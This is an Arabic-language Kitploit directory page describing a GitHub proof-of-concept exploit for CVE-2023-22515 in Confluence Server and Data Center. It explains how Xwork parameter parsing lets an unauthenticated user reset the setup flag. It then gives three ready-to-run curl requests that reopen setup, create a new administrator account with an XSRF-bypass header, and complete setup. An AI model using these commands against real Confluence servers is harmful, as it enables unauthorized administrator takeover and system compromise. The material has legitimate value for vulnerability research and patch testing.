Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-22515-POC — استغلال إثبات المفهوم لـ CVE-2023-22515، ثغرة التحكم في الوصول المكسور الحرجة في Confluence Server وData Center، مما يتيح الاستيلاء على المسؤول دون مصادقة. | Kitploit
أدوات/GitHubGitHub/j3seer/cve-2023-22515-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

استغلال إثبات المفهوم لـ CVE-2023-22515، ثغرة التحكم في الوصول المكسور الحرجة في Confluence Server وData Center، مما يتيح الاستيلاء على المسؤول دون مصادقة.

عرض المستودع
824منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-22515

CVE-2023-22515، ثغرة أمنية حرجة تؤثر على الإصدارات المحلية من Confluence Server وConfluence Data Center، وهي ثغرة في التحكم في الوصول المكسور. قدمت Atlassian درجة أساسية من CVSS تبلغ 10.0

الاستغلال

شرح مختصر:

1- نظرًا لكيفية قيام معترضات Xwork بتحليل المعاملات /test.action?one=a يساوي setOne()='a' وبدلاً من ذلك /test.action?one.two=a يساوي getOne().setTwo()="a"

2- تشمل نقاط النهاية /setup/* استدعاء @ParameterSafe والذي يسمح لنا باستخدام set و get مثل ، ولكن نظرًا لأن نقاط النهاية محظورة لأن الإعداد مكتمل، يمكن استخدام

/setup/setupdb.action?dbConfigInfo.databaseType=postgresql
/setup/*
/server-info.action

3- ابحث عن طريقة set لإكمال الإعداد => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- استخدم رأس "X-Atlassian-Token" لتجاوز XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

المراجع

إخلاء مسؤولية: لم يتم اكتشاف أو صنع الاستغلال بواسطتي، يعود الفضل للمقالات أدناه.

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

تنزيل الأداة